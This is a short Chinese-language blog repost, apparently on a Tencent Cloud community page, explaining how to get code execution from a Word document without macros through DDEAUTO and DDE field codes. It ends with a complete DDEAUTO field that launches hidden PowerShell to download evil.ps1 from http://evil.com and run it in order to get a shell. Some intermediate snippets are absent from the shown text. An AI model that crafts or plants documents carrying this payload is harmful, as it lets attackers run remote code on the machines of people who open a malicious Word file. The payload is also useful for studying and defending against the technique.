首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

MSWord Code Exec Without Macro

今天学到了一个新的Word执行代码的方式,也是不需要启用宏的,所以分享给大家一波。操作也挺简单的。

首先新建一个word文档,然后插入域:

选择 = (Formula)

右键,切换域代码

代码处修改为

之后,右键更新域,再把文档改成docx格式即可。最终效果如下:

比较鸡肋的是点是以后才会执行。

除了使用DDEAUTO,使用DDE也是可以的,具体如下:

需要注意的是,使用DDE不会自动执行,需要对文档进行修改,将文档重命名为rar,打开以后修改 word/settings.xml,添加

个人感觉使用DDE效果更好点。

如何获取交互式shell ?

{ DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evil.com/evil.ps1');powershell -e $e "}

文章出处:Evi1cg's blog

你可能喜欢

  • 发表于:
  • 原文链接http://kuaibao.qq.com/s/20180506B0A6LZ00?refer=cp_1026
  • 腾讯「腾讯云开发者社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 cloudcommunity@tencent.com 删除。

扫码

添加站长 进交流群

领取专属 10元无门槛券

私享最新 技术干货

扫码加入开发者社群
领券